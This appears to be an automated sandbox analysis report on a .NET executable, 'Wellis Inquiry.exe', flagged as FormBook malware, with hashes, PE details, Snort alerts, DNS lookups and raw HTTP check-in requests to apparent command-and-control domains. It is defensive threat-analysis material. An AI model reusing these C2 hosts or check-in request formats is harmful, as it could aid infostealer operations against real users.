                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wellis Inquiry.exe.log
                                                          Process:C:\Users\user\Desktop\Wellis Inquiry.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.355304211458859
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.925371225202555
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:Wellis Inquiry.exe
                                                          File size:337408
                                                          MD5:c357a8010e661a49df2e813bd22590b6
                                                          SHA1:08ecd005e1449ec97d0405e83649686ae35f6286
                                                          SHA256:eef137583da6deb4a1be9882cede6cec5112b74ae79c0773f45b13346c5b2890
                                                          SHA512:71957a0cd597213808b15b1abe9ce3df07889627b4a1b849362df07de6da3984803c6b2e6487338375a558dc9c1f0db32aee42fde89cee305078c22d6b92890e
                                                          SSDEEP:6144:YaX+sbCdgMkhBJDxtvArlcq90N9prggZmNqoPjLfsPbU9wgJlhjb3BB5NAwg6oBm:Y/pd7SBBArlMN9FsrPXETWwa53BB5NAk
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga..............0..............:... ...@....@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:00828e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x453ab2
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x616787BC [Thu Oct 14 01:28:28 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:v4.0.30319
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x53a600x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x5d4.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x560000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x51ab80x51c00False0.952127532492data7.93897204497IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x540000x5d40x600False0.4296875data4.15892523316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x560000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_VERSION0x540900x344data
                                                          RT_MANIFEST0x543e40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Version Infos

                                                          DescriptionData
                                                          Translation0x0000 0x04b0
                                                          LegalCopyrightCopyright 2015 - 2021
                                                          Assembly Version1.0.0.0
                                                          InternalNameMutexAccessRu.exe
                                                          FileVersion1.0.0.0
                                                          CompanyName
                                                          LegalTrademarks
                                                          Comments
                                                          ProductNameWin UsbInit
                                                          ProductVersion1.0.0.0
                                                          FileDescriptionWin UsbInit
                                                          OriginalFilenameMutexAccessRu.exe

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          10/14/21-07:29:45.850339TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.4183.90.240.3
                                                          10/14/21-07:29:45.850339TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.4183.90.240.3
                                                          10/14/21-07:29:45.850339TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.4183.90.240.3
                                                          10/14/21-07:29:51.188764TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981480192.168.2.434.102.136.180
                                                          10/14/21-07:29:51.188764TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981480192.168.2.434.102.136.180
                                                          10/14/21-07:29:51.188764TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981480192.168.2.434.102.136.180
                                                          10/14/21-07:29:51.303333TCP1201ATTACK-RESPONSES 403 Forbidden804981434.102.136.180192.168.2.4
                                                          10/14/21-07:29:56.615066TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981880192.168.2.4151.106.117.36
                                                          10/14/21-07:29:56.615066TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981880192.168.2.4151.106.117.36
                                                          10/14/21-07:29:56.615066TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981880192.168.2.4151.106.117.36
                                                          10/14/21-07:29:57.113888TCP1201ATTACK-RESPONSES 403 Forbidden8049818151.106.117.36192.168.2.4
                                                          10/14/21-07:30:17.527386TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984280192.168.2.4199.59.242.153
                                                          10/14/21-07:30:17.527386TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984280192.168.2.4199.59.242.153
                                                          10/14/21-07:30:17.527386TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984280192.168.2.4199.59.242.153
                                                          10/14/21-07:30:28.557863TCP1201ATTACK-RESPONSES 403 Forbidden804984723.227.38.74192.168.2.4

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 14, 2021 07:29:45.562988997 CEST4980880192.168.2.4183.90.240.3
                                                          Oct 14, 2021 07:29:45.846936941 CEST8049808183.90.240.3192.168.2.4
                                                          Oct 14, 2021 07:29:45.850227118 CEST4980880192.168.2.4183.90.240.3
                                                          Oct 14, 2021 07:29:45.850338936 CEST4980880192.168.2.4183.90.240.3
                                                          Oct 14, 2021 07:29:46.134744883 CEST8049808183.90.240.3192.168.2.4
                                                          Oct 14, 2021 07:29:46.135214090 CEST8049808183.90.240.3192.168.2.4
                                                          Oct 14, 2021 07:29:46.135237932 CEST8049808183.90.240.3192.168.2.4
                                                          Oct 14, 2021 07:29:46.135498047 CEST4980880192.168.2.4183.90.240.3
                                                          Oct 14, 2021 07:29:46.135566950 CEST4980880192.168.2.4183.90.240.3
                                                          Oct 14, 2021 07:29:46.421039104 CEST8049808183.90.240.3192.168.2.4
                                                          Oct 14, 2021 07:29:51.170027971 CEST4981480192.168.2.434.102.136.180
                                                          Oct 14, 2021 07:29:51.187925100 CEST804981434.102.136.180192.168.2.4
                                                          Oct 14, 2021 07:29:51.188422918 CEST4981480192.168.2.434.102.136.180
                                                          Oct 14, 2021 07:29:51.188764095 CEST4981480192.168.2.434.102.136.180
                                                          Oct 14, 2021 07:29:51.206609011 CEST804981434.102.136.180192.168.2.4
                                                          Oct 14, 2021 07:29:51.303333044 CEST804981434.102.136.180192.168.2.4
                                                          Oct 14, 2021 07:29:51.303390026 CEST804981434.102.136.180192.168.2.4
                                                          Oct 14, 2021 07:29:51.303857088 CEST4981480192.168.2.434.102.136.180
                                                          Oct 14, 2021 07:29:51.303914070 CEST4981480192.168.2.434.102.136.180
                                                          Oct 14, 2021 07:29:51.617247105 CEST4981480192.168.2.434.102.136.180
                                                          Oct 14, 2021 07:29:51.635545015 CEST804981434.102.136.180192.168.2.4
                                                          Oct 14, 2021 07:29:56.355865955 CEST4981880192.168.2.4151.106.117.36
                                                          Oct 14, 2021 07:29:56.609545946 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:56.609750986 CEST4981880192.168.2.4151.106.117.36
                                                          Oct 14, 2021 07:29:56.615066051 CEST4981880192.168.2.4151.106.117.36
                                                          Oct 14, 2021 07:29:56.867995977 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:57.113888025 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:57.113965988 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:57.114002943 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:57.114037037 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:57.114070892 CEST4981880192.168.2.4151.106.117.36
                                                          Oct 14, 2021 07:29:57.114078999 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:57.114100933 CEST4981880192.168.2.4151.106.117.36
                                                          Oct 14, 2021 07:29:57.114115953 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:57.114142895 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:57.114168882 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:57.114192963 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:57.114217997 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:57.114242077 CEST4981880192.168.2.4151.106.117.36
                                                          Oct 14, 2021 07:29:57.114244938 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:29:57.114272118 CEST4981880192.168.2.4151.106.117.36
                                                          Oct 14, 2021 07:29:57.114362955 CEST4981880192.168.2.4151.106.117.36
                                                          Oct 14, 2021 07:29:57.114530087 CEST4981880192.168.2.4151.106.117.36
                                                          Oct 14, 2021 07:29:57.368109941 CEST8049818151.106.117.36192.168.2.4
                                                          Oct 14, 2021 07:30:12.273660898 CEST4984180192.168.2.4104.21.2.218
                                                          Oct 14, 2021 07:30:12.289676905 CEST8049841104.21.2.218192.168.2.4
                                                          Oct 14, 2021 07:30:12.290152073 CEST4984180192.168.2.4104.21.2.218
                                                          Oct 14, 2021 07:30:12.290184021 CEST4984180192.168.2.4104.21.2.218
                                                          Oct 14, 2021 07:30:12.306087971 CEST8049841104.21.2.218192.168.2.4
                                                          Oct 14, 2021 07:30:12.313358068 CEST8049841104.21.2.218192.168.2.4
                                                          Oct 14, 2021 07:30:12.313596010 CEST8049841104.21.2.218192.168.2.4
                                                          Oct 14, 2021 07:30:12.313697100 CEST4984180192.168.2.4104.21.2.218
                                                          Oct 14, 2021 07:30:12.313725948 CEST4984180192.168.2.4104.21.2.218
                                                          Oct 14, 2021 07:30:12.330281019 CEST8049841104.21.2.218192.168.2.4
                                                          Oct 14, 2021 07:30:17.426793098 CEST4984280192.168.2.4199.59.242.153
                                                          Oct 14, 2021 07:30:17.526969910 CEST8049842199.59.242.153192.168.2.4
                                                          Oct 14, 2021 07:30:17.527101040 CEST4984280192.168.2.4199.59.242.153
                                                          Oct 14, 2021 07:30:17.527385950 CEST4984280192.168.2.4199.59.242.153
                                                          Oct 14, 2021 07:30:17.627717972 CEST8049842199.59.242.153192.168.2.4
                                                          Oct 14, 2021 07:30:17.628267050 CEST8049842199.59.242.153192.168.2.4
                                                          Oct 14, 2021 07:30:17.628300905 CEST8049842199.59.242.153192.168.2.4
                                                          Oct 14, 2021 07:30:17.628323078 CEST8049842199.59.242.153192.168.2.4
                                                          Oct 14, 2021 07:30:17.628499985 CEST4984280192.168.2.4199.59.242.153
                                                          Oct 14, 2021 07:30:17.628571987 CEST4984280192.168.2.4199.59.242.153
                                                          Oct 14, 2021 07:30:28.493421078 CEST4984780192.168.2.423.227.38.74
                                                          Oct 14, 2021 07:30:28.509732962 CEST804984723.227.38.74192.168.2.4
                                                          Oct 14, 2021 07:30:28.510006905 CEST4984780192.168.2.423.227.38.74
                                                          Oct 14, 2021 07:30:28.510090113 CEST4984780192.168.2.423.227.38.74
                                                          Oct 14, 2021 07:30:28.525974035 CEST804984723.227.38.74192.168.2.4
                                                          Oct 14, 2021 07:30:28.557862997 CEST804984723.227.38.74192.168.2.4
                                                          Oct 14, 2021 07:30:28.557920933 CEST804984723.227.38.74192.168.2.4
                                                          Oct 14, 2021 07:30:28.557960033 CEST804984723.227.38.74192.168.2.4
                                                          Oct 14, 2021 07:30:28.557998896 CEST804984723.227.38.74192.168.2.4
                                                          Oct 14, 2021 07:30:28.558028936 CEST804984723.227.38.74192.168.2.4
                                                          Oct 14, 2021 07:30:28.558054924 CEST4984780192.168.2.423.227.38.74
                                                          Oct 14, 2021 07:30:28.558067083 CEST4984780192.168.2.423.227.38.74
                                                          Oct 14, 2021 07:30:28.558100939 CEST804984723.227.38.74192.168.2.4
                                                          Oct 14, 2021 07:30:28.558126926 CEST804984723.227.38.74192.168.2.4
                                                          Oct 14, 2021 07:30:28.558146954 CEST4984780192.168.2.423.227.38.74
                                                          Oct 14, 2021 07:30:28.558171988 CEST4984780192.168.2.423.227.38.74
                                                          Oct 14, 2021 07:30:28.576592922 CEST4984780192.168.2.423.227.38.74

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 14, 2021 07:29:45.284503937 CEST5679453192.168.2.48.8.8.8
                                                          Oct 14, 2021 07:29:45.550026894 CEST53567948.8.8.8192.168.2.4
                                                          Oct 14, 2021 07:29:51.145488024 CEST5662753192.168.2.48.8.8.8
                                                          Oct 14, 2021 07:29:51.167728901 CEST53566278.8.8.8192.168.2.4
                                                          Oct 14, 2021 07:29:56.321822882 CEST5662153192.168.2.48.8.8.8
                                                          Oct 14, 2021 07:29:56.353691101 CEST53566218.8.8.8192.168.2.4
                                                          Oct 14, 2021 07:30:07.181576967 CEST6311653192.168.2.48.8.8.8
                                                          Oct 14, 2021 07:30:07.220613956 CEST53631168.8.8.8192.168.2.4
                                                          Oct 14, 2021 07:30:12.243588924 CEST6407853192.168.2.48.8.8.8
                                                          Oct 14, 2021 07:30:12.267743111 CEST53640788.8.8.8192.168.2.4
                                                          Oct 14, 2021 07:30:17.323776960 CEST6480153192.168.2.48.8.8.8
                                                          Oct 14, 2021 07:30:17.425107002 CEST53648018.8.8.8192.168.2.4
                                                          Oct 14, 2021 07:30:22.664800882 CEST5125553192.168.2.48.8.8.8
                                                          Oct 14, 2021 07:30:22.688800097 CEST53512558.8.8.8192.168.2.4
                                                          Oct 14, 2021 07:30:28.433368921 CEST5233753192.168.2.48.8.8.8
                                                          Oct 14, 2021 07:30:28.462132931 CEST53523378.8.8.8192.168.2.4
                                                          Oct 14, 2021 07:30:33.582624912 CEST5504653192.168.2.48.8.8.8
                                                          Oct 14, 2021 07:30:33.607409954 CEST53550468.8.8.8192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Oct 14, 2021 07:29:45.284503937 CEST192.168.2.48.8.8.80x5aebStandard query (0)www.marunouchi1.comA (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:29:51.145488024 CEST192.168.2.48.8.8.80x8c07Standard query (0)www.psychedeliccosmetics.comA (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:29:56.321822882 CEST192.168.2.48.8.8.80x2138Standard query (0)www.aceserial.xyzA (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:07.181576967 CEST192.168.2.48.8.8.80xaaa7Standard query (0)www.blackmagiccomics.comA (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:12.243588924 CEST192.168.2.48.8.8.80xa1ccStandard query (0)www.ebookgratis.onlineA (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:17.323776960 CEST192.168.2.48.8.8.80x3ce0Standard query (0)www.ovmfinacial.comA (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:22.664800882 CEST192.168.2.48.8.8.80x9df8Standard query (0)www.richartware.comA (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:28.433368921 CEST192.168.2.48.8.8.80xbb3cStandard query (0)www.dollpartyla.comA (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:33.582624912 CEST192.168.2.48.8.8.80x375bStandard query (0)www.quickcarehomeopathic.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Oct 14, 2021 07:29:45.550026894 CEST8.8.8.8192.168.2.40x5aebNo error (0)www.marunouchi1.com183.90.240.3A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:29:51.167728901 CEST8.8.8.8192.168.2.40x8c07No error (0)www.psychedeliccosmetics.compsychedeliccosmetics.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 14, 2021 07:29:51.167728901 CEST8.8.8.8192.168.2.40x8c07No error (0)psychedeliccosmetics.com34.102.136.180A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:29:56.353691101 CEST8.8.8.8192.168.2.40x2138No error (0)www.aceserial.xyzaceserial.xyzCNAME (Canonical name)IN (0x0001)
                                                          Oct 14, 2021 07:29:56.353691101 CEST8.8.8.8192.168.2.40x2138No error (0)aceserial.xyz151.106.117.36A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:07.220613956 CEST8.8.8.8192.168.2.40xaaa7Name error (3)www.blackmagiccomics.comnonenoneA (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:12.267743111 CEST8.8.8.8192.168.2.40xa1ccNo error (0)www.ebookgratis.online104.21.2.218A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:12.267743111 CEST8.8.8.8192.168.2.40xa1ccNo error (0)www.ebookgratis.online172.67.129.186A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:17.425107002 CEST8.8.8.8192.168.2.40x3ce0No error (0)www.ovmfinacial.com199.59.242.153A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:22.688800097 CEST8.8.8.8192.168.2.40x9df8Name error (3)www.richartware.comnonenoneA (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:28.462132931 CEST8.8.8.8192.168.2.40xbb3cNo error (0)www.dollpartyla.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 14, 2021 07:30:28.462132931 CEST8.8.8.8192.168.2.40xbb3cNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST8.8.8.8192.168.2.40x375bNo error (0)www.quickcarehomeopathic.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST8.8.8.8192.168.2.40x375bNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST8.8.8.8192.168.2.40x375bNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST8.8.8.8192.168.2.40x375bNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST8.8.8.8192.168.2.40x375bNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST8.8.8.8192.168.2.40x375bNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST8.8.8.8192.168.2.40x375bNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                          Oct 14, 2021 07:30:33.607409954 CEST8.8.8.8192.168.2.40x375bNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • www.marunouchi1.com
                                                          • www.psychedeliccosmetics.com
                                                          • www.aceserial.xyz
                                                          • www.ebookgratis.online
                                                          • www.ovmfinacial.com
                                                          • www.dollpartyla.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.449808183.90.240.380C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 14, 2021 07:29:45.850338936 CEST2545OUTGET /ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ HTTP/1.1
                                                          Host: www.marunouchi1.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 14, 2021 07:29:46.135214090 CEST2546INHTTP/1.1 302 Found
                                                          Server: nginx
                                                          Date: Thu, 14 Oct 2021 05:29:46 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 312
                                                          Connection: close
                                                          Location: https://www.marunouchi1.com/ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 72 75 6e 6f 75 63 68 69 31 2e 63 6f 6d 2f 61 67 39 76 2f 3f 39 72 71 3d 52 5a 78 4a 47 56 31 39 4e 4f 44 7a 36 2f 73 50 6c 35 30 72 63 73 6a 50 43 6d 68 66 66 30 42 32 63 51 4e 53 44 39 58 4e 48 6c 7a 75 41 6b 7a 33 74 57 79 31 74 7a 33 67 6e 73 76 32 49 49 33 4f 4b 66 58 77 26 61 6d 70 3b 42 46 51 3d 35 6a 49 30 6a 68 4d 48 41 30 68 78 5f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.marunouchi1.com/ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&amp;BFQ=5jI0jhMHA0hx_">here</a>.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.44981434.102.136.18080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 14, 2021 07:29:51.188764095 CEST5497OUTGET /ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_ HTTP/1.1
